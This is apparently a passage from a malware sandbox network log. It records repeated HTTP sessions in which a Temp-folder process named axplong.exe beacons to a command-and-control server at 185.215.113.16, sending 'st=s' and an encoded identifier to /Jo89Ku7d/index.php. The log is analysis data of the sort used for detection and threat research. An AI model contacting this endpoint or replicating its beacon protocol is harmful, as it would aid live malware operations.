Jul 27, 2024 09:35:15.426304102 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49731	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:15.540766954 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:16.278747082 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:16.279750109 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:16.526026011 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49732	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:16.634820938 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:17.435533047 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:17.436959028 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:17.683476925 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49733	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:17.790524006 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:18.540328979 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:18.541156054 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:18.788273096 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49734	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:18.908792019 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:19.694700956 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:19.695584059 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:19.946804047 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49735	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:20.057841063 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:20.808569908 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:20.811388969 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:21.058656931 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49737	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:21.182579994 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:21.943689108 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:21.944624901 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:22.195077896 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49738	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:22.508475065 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:23.267412901 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:23.268232107 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:23.579539061 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49739	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:23.697460890 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:24.446705103 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:24.447643995 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:24.822426081 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49740	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:24.936054945 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:25.850984097 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:25.852160931 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:26.133748055 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49741	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:26.244283915 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:26.995523930 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:26.996520042 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:27.258722067 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49742	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:27.369517088 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:28.113677025 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:28.114548922 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:28.362354040 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49743	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:28.478334904 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:29.219233990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:29.220431089 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:29.468216896 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49744	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:29.588962078 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:30.354145050 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
